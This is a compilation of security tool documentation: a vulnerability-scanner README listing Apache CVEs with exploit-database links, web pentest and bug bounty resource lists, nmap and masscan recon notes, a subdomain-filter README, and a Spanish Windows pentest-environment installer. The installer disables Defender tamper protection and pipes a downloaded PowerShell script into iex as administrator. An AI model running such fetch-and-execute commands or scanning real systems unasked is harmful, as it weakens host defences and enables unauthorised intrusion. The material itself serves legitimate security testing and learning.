In order to take it one step further, the ExploitDB and SecurityFocus references are extracted from the CVE entries, which allows the script to provide direct links to the exploits. In order to provide perfect ExploitDB and SecurityFocus results for the vulnerabilities, curated lists will have to be used during database updates. If these lists are missing, ExploitDB and SecurityFocus links will still be displayed, but with issues: the SecurityFocus IDs are listed, but information is not available in the CVE entries themselves on whether the SecurityFocus exploit page has any content or not; similarly, the ExploitDB references seem to be missing quite a few entries.
The curated list for ExploitDB will act as a supplemental EDB-CVE map to the ones found in the CVE references. The SecurityFocus list is a list of SecurityFocus IDs with exploit entries, and this list will be used to determine whether a SecurityFocus CVE reference will be imported or not.
The following exploit databases are currently supported, with provided curated lists:
* **ExploitDB** at `nvd/exploitdb.lst`
* **SecurityFocus** at `nvd/securityfocus.lst`
* **Metasploit** at `nvd/metasploit.lst`
* **1337day** at `nvd/1337day.lst`
### Origin
The idea for this comes from my other open-source project, [Host Scanner](https://github.com/RoliSoft/Host-Scanner), which does exactly this, but is written in C++ and is focused more towards security researchers and system administrators, as opposed to CTF players.
The C++ version has a slightly different feature set compared to this Python version: while the main goal of the Python version is to parse nmap reports and end up at exploit links, the C++ version has its own active and passive network scanner, service identifier, and researcher-oriented features, such as non-intrusive vulnerability validation through package manager changelog reports.
### Usage
usage: vulnscan.py [-h] [-a] [-e] [-u] [query]
positional arguments:
query CPE name, full name and version to fuzzy match, or path to nmap report (generated with -sV)
optional arguments:
-h, --help show this help message and exit
-a, --all dump all vulnerabilities for a CPE when no version is included (off by default)
-e, --exploits dump only vulnerabilities with public exploits available
-u, --update download the CVE dumps and recreate the local database
#### Example run
$ ./vulnscan.py 'Apache 2.2.8'
[*] Performing fuzzy matching for Apache 2.2.8...
[*] Fuzzy-matched query to name cpe:/a:apache:http_server:2.2.8
[*] Entry cpe:/a:apache:http_server:2.2.8 has the following vulnerabilities:
** or **
$ ./vulnscan.py nmap_scan.xml
[*] Processing nmap report nmap_scan.xml...
[*] Service 192.168.1.84:80/tcp is cpe:/a:apache:http_server:2.2.8
[*] Entry cpe:/a:apache:http_server:2.2.8 has the following vulnerabilities:
>>> CVE-2014-0231 The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechani >
>>> CVE-2014-0098 The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP >
>>> CVE-2013-6438 The dav_xml_get_cdata function in main/util.c in the mod_dav module in the Apache HTTP Serv >
>>> CVE-2013-2249 mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proc >
>>> CVE-2013-1896 mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV i >
>>> CVE-2013-1862 mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 write >
>>> CVE-2012-4558 Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the >
>>> CVE-2012-3499 Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before >
>>> CVE-2012-2687 Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mo >
>>> CVE-2012-0883 envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length direc >
>>> CVE-2012-0053 protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header >
>>> CVE-2012-0031 scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause >
>>> CVE-2011-4415 The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and >
>>> CVE-2011-4317 The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, >
>>> CVE-2011-3639 The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18 >
>>> CVE-2011-3607 Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0. >
>>> CVE-2011-3368 The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, >
>>> CVE-2011-3348 The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_ >
>>> CVE-2011-3192 The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x throu >
>>> CVE-2011-0419 Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apach >
>>> CVE-2010-1452 The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 all >
>>> CVE-2010-0434 The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2. >
>>> CVE-2010-0425 modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63 >
>>> CVE-2010-0408 The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Se >
>>> CVE-2009-3555 The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Inter >
>>> CVE-2009-2699 The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Por >
>>> CVE-2009-1891 The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until comp >
>>> CVE-2009-1890 The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HT >
>>> CVE-2009-1195 The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=Inc >
>>> CVE-2008-2939 Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apac >
>>> CVE-2008-2364 The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in >
>>> CVE-2007-6750 The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (da >
[*] Entry cpe:/a:apache:http_server:2.2.8 has the following public exploits:
>>> CVE-2014-0231
- Apache HTTP Server CVE-2014-0231 Remote Denial of Service
http://www.securityfocus.com/bid/68742/exploit
>>> CVE-2014-0098
- Apache HTTP Server Multiple Denial of Service
http://www.securityfocus.com/bid/66303/exploit
>>> CVE-2013-6438
- Apache HTTP Server Multiple Denial of Service
http://www.securityfocus.com/bid/66303/exploit
>>> CVE-2013-1862
- Apache HTTP Server Terminal Escape Sequence in Logs Command Injection
http://www.securityfocus.com/bid/59826/exploit
- RETIRED: Oracle January 2014 Critical Patch Update Multiple
http://www.securityfocus.com/bid/64758/exploit
>>> CVE-2012-4558
- Apache HTTP Server Multiple Cross Site Scripting
http://www.securityfocus.com/bid/58165/exploit
- RETIRED: Oracle January 2014 Critical Patch Update Multiple
http://www.securityfocus.com/bid/64758/exploit
>>> CVE-2012-3499
- Apache HTTP Server Multiple Cross Site Scripting
http://www.securityfocus.com/bid/58165/exploit
- RETIRED: Oracle January 2014 Critical Patch Update Multiple
http://www.securityfocus.com/bid/64758/exploit
>>> CVE-2012-2687
- Apache HTTP Server HTML-Injection And Information Disclosure
http://www.securityfocus.com/bid/55131/exploit
>>> CVE-2012-0053
- Apache - httpOnly Cookie Disclosure
https://www.exploit-db.com/exploits/18442
- Apache HTTP Server 'httpOnly' Cookie Information Disclosure
http://www.securityfocus.com/bid/51706/exploit
>>> CVE-2012-0031
- Apache HTTP Server Scoreboard Local Security Bypass
http://www.securityfocus.com/bid/51407/exploit
>>> CVE-2011-4317
- Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass
https://www.exploit-db.com/exploits/36352
>>> CVE-2011-3639
- Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass
https://www.exploit-db.com/exploits/36663
>>> CVE-2011-3607
- Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation
http://www.securityfocus.com/bid/50494/exploit
>>> CVE-2011-3368
- Apache mod_proxy - Reverse Proxy Exposure (PoC)
https://www.exploit-db.com/exploits/17969
- Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure
http://www.securityfocus.com/bid/49957/exploit
- Apache Reverse Proxy Bypass Vulnerability Scanner
metasploit auxiliary/scanner/http/rewrite_proxy_bypass
>>> CVE-2011-3348
- Apache HTTP Server CVE-2011-3348 Denial Of Service
http://www.securityfocus.com/bid/49616/exploit
>>> CVE-2011-3192
- Apache - Remote Denial of Service (Memory Exhaustion)
https://www.exploit-db.com/exploits/17696
- Apache - Denial of Service
https://www.exploit-db.com/exploits/18221
- Apache HTTP Server CVE-2011-3192 Denial Of Service
http://www.securityfocus.com/bid/49303/exploit
- Apache Range Header DoS (Apache Killer)
metasploit auxiliary/dos/http/apache_range_dos
>>> CVE-2011-0419
- Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service
https://www.exploit-db.com/exploits/35738
>>> CVE-2010-0434
- Apache 'mod_isapi' Memory Corruption
http://www.securityfocus.com/bid/38494/exploit
>>> CVE-2010-0425
- Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit
https://www.exploit-db.com/exploits/11650
- Win32 - Write-to-file Shellcode (278 bytes)
https://www.exploit-db.com/exploits/14288
- Apache 'mod_isapi' Memory Corruption
http://www.securityfocus.com/bid/38494/exploit
- Apache mod_isapi Dangling Pointer
metasploit auxiliary/dos/http/apache_mod_isapi
>>> CVE-2009-3555
- TLS - Renegotiation (PoC)
https://www.exploit-db.com/exploits/10579
- Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass
https://www.exploit-db.com/exploits/10071
- Multiple Vendor TLS Protocol Session Renegotiation Security
http://www.securityfocus.com/bid/36935/exploit
>>> CVE-2009-1195
- Apache 'Options' and 'AllowOverride' Directives Security Bypass
http://www.securityfocus.com/bid/35115/exploit
>>> CVE-2008-2939
- Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting
http://www.securityfocus.com/bid/30560/exploit
## Licensing
Copyright (c) `2017` `RoliSoft <[email protected]>`
This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but without any warranty; without even the implied warranty of merchantability or fitness for a particular purpose.
For more information regarding the terms and conditions of this software, please read the full legal text of the GNU Affero General Public License version 3, a copy of which is available in the [LICENSE.md](LICENSE.md) file. Otherwise, see <<http://www.gnu.org/licenses/>>.
Some of the invoked tools are licensed under GPL or a form of GPL-derived license with added clauses further restricting how data produced by the tool can be processed, e.g. nmap. |
# Web App Hacking
## **Web App Testing Resources**
{% tabs %}
{% tab title="Guides" %}
* [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/) - comprehensive guide to testing the security of web applications and web services created by the OWASP foundation.
* [https://owasp.org/www-project-top-ten/](https://owasp.org/www-project-top-ten/) - Guide to the top ten most common vulnerabilities encountered in web app pentesting.
* [OWASP Testing Guide 4.0](https://www.owasp.org/images/1/19/OTGv4.pdf) (PDF)
* [https://www.crest-approved.org/membership/crest-ovs-programme/](https://www.crest-approved.org/membership/crest-ovs-programme/) - CREST's New application secuyrity standard built with OWASP AVS.
* [Hacktricks Web Pentesting Guide](https://book.hacktricks.xyz/pentesting/pentesting-web) - Written by Carlos Pollop, the creator of [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) and [LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). Everything this guy makes is gold. Highest of recommendations
* [The Bug Hunters Methodology](https://github.com/jhaddix/tbhm) - Written by the Jason Haddix, this repo details his toolset and methodology for web app penetration testing.
* [Jason's Presentation of TBHM 2.0](https://docs.google.com/presentation/d/1VpRT8dFyTaFpQa9jhehtmGaC7TqQniMSYbUdlHN6VrY/edit#slide=id.p)
* [Updated info of TBHM 4.02](https://docs.google.com/presentation/d/1MWWXXRvvesWL8V-GiwGssvg4iDM58\_RMeI\_SZ65VXwQ/mobilepresent?slide=id.p)
* [HowToHunt](https://kathan19.gitbook.io/howtohunt/) - Amazing collaborative project documenting testing methodology for different web application vulnerabilities.
* [https://kathan19.gitbook.io/howtohunt/checklist/web-application-pentesting-checklist](https://kathan19.gitbook.io/howtohunt/checklist/web-application-pentesting-checklist)
* [https://alike-lantern-72d.notion.site/Web-Application-Penetration-Testing-Checklist-4792d95add7d4ffd85dd50a5f50659c6](https://alike-lantern-72d.notion.site/Web-Application-Penetration-Testing-Checklist-4792d95add7d4ffd85dd50a5f50659c6)
* [https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web\_Checklist\_by\_Chintan\_Gurjar.pdf](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web\_Checklist\_by\_Chintan\_Gurjar.pdf)
* [https://github.com/KathanP19/HowToHunt/blob/master/CheckList/mindmap.png](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/mindmap.png)
* [https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web\_Penetration\_Testing\_Methodology%402x.png](https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web\_Penetration\_Testing\_Methodology%402x.png)
* [https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md](https://github.com/jassics/security-study-plan/blob/main/web-pentest-study-plan.md)
{% endtab %}
{% tab title="Resources" %}
### Resources
There is a bug bounty focused search engine at [https://www.bugbountyhunting.com/?](https://www.bugbountyhunting.com/?) that can point you in the direction of tools, attacks, methodology, writeups, anything you want. It is amazing.
* [bug-bounty-methodology-m **** ethodology-toolkit-tips-tricks-blogs-v-1-0](https://eforensicsmag.com/bug-bounty-methodology-methodology-toolkit-tips-tricks-blogs-v-1-0-by-sanyam-chawla/)
* [bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0](https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0/)
* [https://pentestbook.six2dez.com/others/web-checklist](https://pentestbook.six2dez.com/others/web-checklist)
* [https://pentestbook.six2dez.com/others/web-fuzzers-comparision](https://pentestbook.six2dez.com/others/web-fuzzers-comparision)
* [https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
* _Operator Handbook: Web\_Exploit - pg.318_
{% endtab %}
{% tab title="Resource Collections" %}
* [Awesome Lists Collection: Web Hacking](https://github.com/infoslack/awesome-web-hacking)
* [Awesome Lists Collection: Web Security](https://github.com/qazbnm456/awesome-web-security)
* [Awesome Lists Collection: Hacker API Tools](https://github.com/Hacker0x01/awesome-hacker-api-tools)
* [Awesome Lists Collection: Application Security](https://github.com/paragonie/awesome-appsec)
* [InfoSec Reference: Web and Web Applications.](https://github.com/rmusser01/Infosec\_Reference/blob/master/Draft/Web.md)
* [InfoSec Reference: Fuzzing](https://github.com/rmusser01/Infosec\_Reference/blob/master/Draft/Fuzzing.md)
* [Bug Bounty Forum's Tool List](https://bugbountyforum.com/tools/)
* [EdOverflow/bugbounty-cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet)
* [yasinS/bug-bounty-reference](https://github.com/yasinS/bug-bounty-reference)
* [Shiva108/Web-CTF-Cheatsheet](https://github.com/Shiva108/CTF-notes/tree/master/Web-CTF-Cheatsheet)
* [Daniel Meissler's Web Security Testing Resources](https://danielmiessler.com/projects/webappsec\_testing\_resources/)
* [Web App Hacking Research by James Kettle](https://skeletonscribe.net/) - Everything that isnt posted on [PortSwigger.com/research](https://portswigger.net/research), this site is the blog for the research done by PortSwigger's Head of research, James Kettle.
* [Web App Payload Collection](https://github.com/foospidy/payloads)
* [https://pentestbook.six2dez.com/enumeration/webservices/](https://pentestbook.six2dez.com/enumeration/webservices/) - Tools and attacks for specific web services.
{% endtab %}
{% endtabs %}
## **Bug Bounty**
{% tabs %}
{% tab title="Platforms" %}
### Platforms
* [https://www.hackerone.com/](https://www.hackerone.com/)
* [https://www.bugcrowd.com/](https://www.bugcrowd.com/)
* [https://bugcrowd.com/programs/organizations/cisa](https://bugcrowd.com/programs/organizations/cisa)
* [https://www.synack.com/](https://www.synack.com/)
* [https://cobalt.io/](https://cobalt.io/)
* [https://www.intigriti.com](https://www.intigriti.com)
* [https://www.zerocopter.com/](https://www.zerocopter.com/)
* [https://www.yeswehack.com/](https://www.yeswehack.com/)
* [https://www.antihack.me/](https://www.antihack.me/)
* [https://securebug.se/](https://securebug.se/)
* [https://www.openbugbounty.org/](https://www.openbugbounty.org/)
* [https://security.apple.com/](https://security.apple.com/)
{% endtab %}
{% tab title="Resources and Reference" %}
* Methodology
* [https://github.com/Cyber-Guy1/theCyberGuy\_Recon\_V1.0](https://github.com/Cyber-Guy1/theCyberGuy\_Recon\_V1.0) - Great Methodology MindMap
* [https://labs.detectify.com/2021/11/30/hakluke-creating-the-perfect-bug-bounty-automation](https://labs.detectify.com/2021/11/30/hakluke-creating-the-perfect-bug-bounty-automation/)
* Resource collections
* [awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) - is a comprehensive curated list of available Bug Bounty.
* [Firebounty](https://firebounty.com) — Bug bounty search engine
* Write-up tools
* Bug Bounty Reconnaissance Framework (BBRF)
* [https://github.com/honoki/bbrf-client](https://github.com/honoki/bbrf-client)
* [https://github.com/honoki/bbrf-server](https://github.com/honoki/bbrf-server)
* [https://honoki.net/2020/10/08/introducing-bbrf-yet-another-bug-bounty-reconnaissance-framework/](https://honoki.net/2020/10/08/introducing-bbrf-yet-another-bug-bounty-reconnaissance-framework/)
* Write-ups and Scopes
* [Awesome-Bugbounty-Writeups](https://github.com/devanshbatham/Awesome-Bugbounty-Writeups) - is a curated list of bugbounty writeups.
* ****[**bounty-targets-data**](https://github.com/arkadiyt/bounty-targets-data) **-** This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for reports
* [bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) - is a list of bug bounty write-ups.
* [Bug bounty writeups](https://pentester.land/list-of-bug-bounty-writeups.html) - list of bug bounty writeups (2012-2020).
{% endtab %}
{% endtabs %}
![](<../.gitbook/assets/image (25).png>)
## Web Technologies
{% content-ref url="web-technologies/" %}
[web-technologies](web-technologies/)
{% endcontent-ref %}
## **Attacks and Vulnerabilities**
{% content-ref url="attacks-and-vulnerabilities/" %}
[attacks-and-vulnerabilities](attacks-and-vulnerabilities/)
{% endcontent-ref %}
## **Training and Resources**
**For resources including offensive security courses, books, CTFs and much more, please check out the Training and Resources section of this guide.**
* [https://tryhackme.com/module/intro-to-web-hacking](https://tryhackme.com/module/intro-to-web-hacking)
* [crAPI](https://github.com/OWASP/crAPI) - **c**ompletely **r**idiculous **API** (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.
{% content-ref url="../training/" %}
[training](../training/)
{% endcontent-ref %}
|
# First steps
**Summery:**
- [First steps](#first-steps)
- [1. Port Scan](#1-port-scan)
- [2. Version detection/banner grabbing](#2-version-detectionbanner-grabbing)
- [3. Service Analyses](#3-service-analyses)
- [Notes](#notes)
- [Nmap scripts Path](#nmap-scripts-path)
- [Add nmap vuln script](#add-nmap-vuln-script)
## 1. Port Scan
It is advisable to scan the ports of the target host and save the results in a file:
```sh
mkdir PortScanResults
```
> Fast scan
```sh
nmap -F -oA PortScanResults/QuickScan TARGET_IP
```
> Medium scan
```sh
nmap -oA PortScanResults/MediumScan TARGET_IP
```
> Full port scan
```sh
nmap -p- -v -oA PortScanResults/FullScan TARGET_IP
sudo masscan -i INTERFACE --rate=1000 --ports 0-65535 -oL PortScanResults/FullScan.lst TARGET_IP
```
## 2. Version detection/banner grabbing
```sh
nmap -sV -sC -oA PortScanResults/VersionScan TARGET_IP
```
> Detect vulnerability
```sh
nmap -sV -sC --script vuln -oA nmap/VulnScan TARGET_IP
```
> OS enumeration
```sh
nmap -sV -sC -O -oA PortScanResults/OsScan TARGET_IP
nmap -p 445 --script=smb-os-discovery -oA PortScanResults/OsSmbScan TARGET_IP
```
## 3. Service Analyses
> Searchspoit
```sh
searchpoit SERVICE_NAME
```
> Update searchspoit db
```sh
searchsploit -u
```
## Notes
### Nmap scripts Path
```sh
/usr/share/nmap/scripts
```
Get script information:
```sh
cat /usr/share/nmap/scripts/script.db
grep exploit /usr/share/nmap/scripts/script.db
```
### Add nmap vuln script
```sh
mkdir /tmp/nse-scripts
git clone https://github.com/psc4re/NSE-scripts.git -o /tmp/nse-scripts
# SMBGhost
sudo mv /tmp/nse-scripts/cve-2020-0796.nse /usr/share/nmap/scripts/smb-vuln-cve-2020-0796.nse
# SIGRed
sudo mv /tmp/nse-scripts/cve-2020-1350.nse /usr/share/nmap/scripts/dns-cve-2020-1350.nse
sudo mv /tmp/nse-scripts/CVE-2021-21972.nse /usr/share/nmap/scripts/vsphere-cve-2021-21972.nse
sudo mv /tmp/nse-scripts/proxyshell.nse /usr/share/nmap/scripts/proxyshell.nse
sudo nmap --script-updatedb
```
|
<h1 align="center">dsieve <a href="https://twitter.com/intent/tweet?text=dsieve%20-%20Filter%20and%20enrich%20a%20list%20of%20subdomains%20by%20level%20https%3A%2F%2Fgithub.com%2Ftrickest%2Fdsieve&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1>
<h3 align="center">Filter and enrich a list of subdomains by level</h3>
![dsieve](dsieve.png "dsieve")
Take a single domain or read an input file and extract unique parent domains, enrich subdomains, filter subdomains by level, or find out which subdomains have the most number of sub-subdomains (or sub-sub-subdomains or sub-sub-sub...). Dsieve supports any format of URL, with or without protocol, port, path, parameters.
# Installation
## Binary
Binaries are available in the [latest release](https://github.com/trickest/dsieve/releases/latest).
## Docker
```
docker run quay.io/trickest/dsieve
```
## From source
```
go install github.com/trickest/dsieve@latest
```
# Usage
```
-f string
Filter domain level. Use python slice notation to select range.
Example input: foo.bar.baz.tld
-f 3 bar.baz.tld
-f 3: bar.baz.tld, foo.bar.baz.tld
-f 2:4 baz.tld, bar.baz.tld
-f :3 tld, baz.tld
-i string
Input url or domain
-if string
Input file path, one url/domain per line.
-o string
Output file path, optional
-top int
Only consider top X subdomains of a certain level and return all their subdomains
```
### Example
##### test.txt
```
a.foo.target.com
b.foo.target.com
c.foo.target.com
a.bar.target.com
b.bar.target.com
a.baz.target.com
```
```shell script
# All levels by default
$ dsieve -if test.txt
a.foo.target.com
foo.target.com
target.com
b.foo.target.com
c.foo.target.com
a.bar.target.com
bar.target.com
b.bar.target.com
a.baz.target.com
baz.target.com
# Level 2, the main domain
$ dsieve -if test.txt -f 2
target.com
# Level 3, one level above the main domain
$ dsieve -if test.txt -f 3
foo.target.com
bar.target.com
baz.target.com
# Levels 2 and above, main domain and all its subdomains
$ dsieve -if test.txt -f 2:
a.foo.target.com
foo.target.com
target.com
b.foo.target.com
c.foo.target.com
a.bar.target.com
bar.target.com
b.bar.target.com
a.baz.target.com
baz.target.com
# The top one level 3 subdomain with the highest number of sub-subdomains
$ dsieve -if test.txt -f 3 -top 1
foo.target.com
# The top two level 3 subdomain with the highest number of sub-subdomains
$ dsieve -if test.txt -f 3 -top 2
foo.target.com
bar.target.com
```
# Report Bugs / Feedback
We look forward to any feedback you want to share with us or if you're stuck with a problem you can contact us at [[email protected]](mailto:[email protected]). You can also create an [Issue](https://github.com/trickest/dsieve/issues/new) or pull request on the Github repository.
# Where does this fit in your methodology?
Dsieve is an integral part of many workflows in the Trickest store. Sign up on [trickest.com](https://trickest.com) to get access to these workflows or build your own from scratch!
[<img src="./banner.png" />](https://trickest-access.paperform.co/)
|
# Relativity - Security Tools for Windows Environment
(Actualmente en desarrollo algunas funciones no estan disponibles)
Prepara un entorno con herramientas orientadas al pentesting.
Instalación de forma desatendidad en sistemas Microsoft Windows 10 , contiene una recopilación de herramientas que cubre las necesidades básicas del pentester.
# Comenzando 🚀
### Pre-requisitos 📋
#### Sistema Operativo
- Windows 10 (compilaciones más recientes)
#### Conexión a internet
- Imprescindible para descargar las herramientas
#### Espacio en disco
- PentestTools : += 45Gb libres
- ReversingTools : (aún no disponible)
- WiFiTools : (aún no disponible)
#### Memoria RAM
- += 4Gb
#### CPU
- Cualquier CPU con al menos 2 cores
#### Protección Anti-Tampering
Para realizar la instalación es necesario desactivar antes la protección 'Anti-Tampering' (es obligatorio para la instalación), para más información:
- https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-windows-defender-antivirus.html
### Instalación 🔧
*Soporta ser instalado en un máquina virtual
*El sistema se reiniciará varias veces y se instalarán todos los parches disponibles
Una vez realizado el paso anterior ejecutar el siguiente código en una consola de Powershell como adminstrador:
```powershell
. {iwr -useb https://raw.githubusercontent.com/Relativity-Environment/Relativity_Scripts/master/menu.ps1} | iex ;menu -Force
```
#### ERRORES
El script está aún en desarrollo y aunque la mayoría de errores no interrumpen la instalación hay casos en que si lo hacen, así mismo reiniciando la máquina y volviendo a lanzar la instalación estos errores son resueltos.
Aunque de forma mínima algunas aplicaciones no se estan instalando correctamente, se está trabajando para solventar estos problemas.
### Punto de restauración 🛠️
Al comenzar la instalación se crea un checkpoint que sirve para volver a un punto anterior el sistema en caso de que algo vaya mal o que queramos prescindir del entorno.
## Herramientas disponibles ⚙️
De momento solo estas disponibles las herramentas orientas a pentesting, próximamente se agregarán herramientas para auditorias WiFi y Reversing/Análisis de Malware.
### Informar de errores y sugerencias
Dado que este proyecto se encuentra en una fase muy temprana se agredece el reporte de errores y sugerencias al correo [email protected]
### Pentest Tools (aún en pruebas - no definitivas)
| 1 - Recopilación de Información | 2 - Analisis de Aplicaciones Web | 3 - Analisis de Bases de Datos |
|--------------------------------|---------------------------------------|-----------------------------------|
|[adaudit](https://github.com/phillips321/adaudit) | [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) | [Damn Small SQLi Scanner](https://github.com/stamparm/DSSS)|
|[aquatone](https://github.com/michenriksen/aquatone) | [dirbuster](https://sourceforge.net/projects/dirbuster/) | [whitewidow](https://github.com/WhitewidowScanner/whitewidow/blob/master/whitewidow.rb)
|[Asnlookup](https://github.com/yassineaboukir/Asnlookup) | [droopescan](https://github.com/droope/droopescan) | [jsql-injection](https://github.com/ron190/jsql-injection)
|[CCrawlDNS](https://github.com/lgandx/CCrawlDNS) | [havij](https://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/) | [NoSQLMap](https://github.com/codingo/NoSQLMap)
|[enum4linux](https://github.com/CiscoCXSecurity/enum4linux) | [joomscan](https://github.com/rezasp/joomscan) | [padding-oracle-attacker](https://github.com/KishanBagaria/padding-oracle-attacker)
|[fierce](https://github.com/mschwager/fierce) | [mutiny-fuzzer](https://github.com/Cisco-Talos/mutiny-fuzzer) | [quicksql](https://github.com/trustedsec/quicksql)
|[FOCA](https://github.com/ElevenPaths/FOCA) | [N-Stalker X - Free Edition](https://www.nstalker.com/products/editions/free/) | [safe3si](https://sourceforge.net/projects/safe3si/)
|[gmtcheck](https://www.elevenpaths.com/es/labstools/gmtchecksp/index.html) | [radamsa](https://github.com/aoh/radamsa) | [sqlmap](https://github.com/sqlmapproject/sqlmap)
|[googleindexretriever](https://www.elevenpaths.com/es/labstools/googleindexretriever-2/index.html) |[w3af](https://github.com/andresriancho/w3af) | [themole](https://github.com/tiankonguse/themole)
|[instagram-py](https://github.com/deathsec/instagram-py) | [wapiti](https://wapiti.sourceforge.io/)
|[ipscan](https://github.com/angryip/ipscan) | [weevely3](https://github.com/epinna/weevely3)
|[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) | [wfuzz](https://github.com/xmendez/wfuzz)
|[Maltego Community](https://www.maltego.com/maltego-community/) | [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
|[NetfoxDetective](https://github.com/nesfit/NetfoxDetective) | [OWASP-Xenotix-XSS-Exploit-Framework](https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework)
|[NetworkMiner](https://www.netresec.com/?page=NetworkMiner) | [XSStrike](https://github.com/s0md3v/XSStrike)
|[Nmap](https://nmap.org/) | [zaproxy](https://github.com/zaproxy/zaproxy)
|[PhEmail](https://github.com/Dionach/PhEmail) | [explo](https://github.com/dtag-dev-sec/explo)
|[PhoneInfoga](https://github.com/sundowndev/PhoneInfoga)|
|[Public Intelligence Tool](https://sourceforge.net/projects/publicintelligencetool/)|
|[pwnedOrNot](https://github.com/thewhiteh4t/pwnedOrNot)|
|[Ultimate-Facebook-Scraper](https://github.com/harismuneer/Ultimate-Facebook-Scraper)|
|[sherlock](https://github.com/sherlock-project/sherlock)|
|[smbmap](https://github.com/ShawnDEvans/smbmap)|
|[smtp_diag_tool](https://www.adminkit.net/smtp_diag_tool.aspx)|
|[snmp-scanner](https://sourceforge.net/projects/snmp-scanner/)|
|[spiderfoot](https://www.spiderfoot.net/documentation/)|
|[tacyt-maltego-transforms](https://github.com/ElevenPaths/tacyt-maltego-transforms)|
|[theHarvester](https://github.com/laramies/theHarvester)|
|[wesng](https://github.com/bitsadmin/wesng)|
|[zenmap](https://nmap.org/zenmap/)|
| 4 - Analisis de Vulnerabilidades | 5 - Anonimato | 6 - Ataques de Contraseña |
|--------------------------------|----------------------------------|---------------------------------|
|[RED_HAWK](https://github.com/Tuhinshubhra/RED_HAWK) |[demonsaw](https://www.demonsaw.com/) | [john-jumbo](https://www.openwall.com/john/) |
|[Nessus](https://docs.tenable.com/Nessus.htm) |[onionshare](https://blog.torproject.org/new-release-onionshare-2) | [ncrack](https://nmap.org/ncrack/) |
|[Nikto2](https://cirt.net/Nikto2) |[proxytunnel](https://proxytunnel.sourceforge.io/) | [pack](https://github.com/iphelix/pack) |
|[Vega](https://subgraph.com/vega/) |[tor-network-anon](https://trac.torproject.org/projects/tor/wiki) | [Responder](https://github.com/lgandx/Responder-Windows) |
|[Vulnerator](https://github.com/Vulnerator/Vulnerator) |[torchat](https://github.com/prof7bit/TorChat) | [brutescrape](https://github.com/cheetz/brutescrape) |
| []() | []() | [hashcat](https://hashcat.net/hashcat/) |
